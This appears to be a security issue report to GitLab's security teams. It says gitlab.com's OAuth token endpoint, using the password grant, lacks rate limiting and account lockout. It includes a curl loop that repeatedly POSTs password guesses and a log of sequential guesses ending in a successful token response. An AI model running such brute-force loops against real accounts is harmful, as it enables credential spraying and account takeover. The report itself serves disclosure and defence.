ESCALATED: OAuth Token Endpoint Susceptible to Brute-Force Attacks and Credential Spraying
Summary
The endpoint https://gitlab.com/oauth/token
and grant_type=password
parameter allow potential attackers to evade all safe-guards against credential spraying and account brute-forcing which exist on gitlab.com/users/sign_in
, among them:
-
An arbitrary number of requests can be sent with arbitrary cadence, in this way credentials can be reliably tested.
-
Accounts being brute-forced are never blocked, even after 10 failed attempts at generating valid OAuth tokens. This is usually the case for logging attempts over
/users/sign_in
.
Steps to reproduce
The absence of rate-limiting can be tested easily by repeatedly sending POST grant_type=password
requests to oauth/token
as shown on https://docs.gitlab.com/ce/api/oauth2.html#resource-owner-password-credentials
while true; echo -n `date +'%T'` ' -) ' ; do curl --data 'grant_type=password&username=mymail@domain.com&password=mypassword' --request POST https://gitlab.com/oauth/token; echo; done
Logs from real tests will look as follows:
1561656152.6030874 e: myemail@gitlab.com p: abcde@ valid: False 401
1561656153.3011422 e: myemail@gitlab.com p: abcdeA valid: False 401
1561656154.5376472 e: myemail@gitlab.com p: abcdeB valid: False 401
1561656155.155709 e: myemail@gitlab.com p: abcdeC valid: False 401
1561656155.7969038 e: myemail@gitlab.com p: abcdeD valid: False 401
1561656156.7311993 e: myemail@gitlab.com p: abcdeE valid: False 401
1561656157.3582034 e: myemail@gitlab.com p: abcdeF valid: False 401
1561656158.0892327 e: myemail@gitlab.com p: abcdeG valid: False 401
1561656158.9248016 e: myemail@gitlab.com p: abcdeH valid: False 401
1561656159.6772146 e: myemail@gitlab.com p: abcdeI valid: False 401
1561656160.5643692 e: myemail@gitlab.com p: abcdeJ valid: False 401
1561656161.3276572 e: myemail@gitlab.com p: abcdeK valid: False 401
1561656162.0689363 e: myemail@gitlab.com p: abcdeL valid: False 401
1561656162.8939586 e: myemail@gitlab.com p: abcdeM valid: True 200
{'access_token': '********************************************', 'token_type': 'bearer', 'refresh_token': '*******************************************************', 'scope': 'api', 'created_at': 1561473301}
cc @gitlab-com/gl-security/secops @gitlab-com/gl-security/appsec @asaba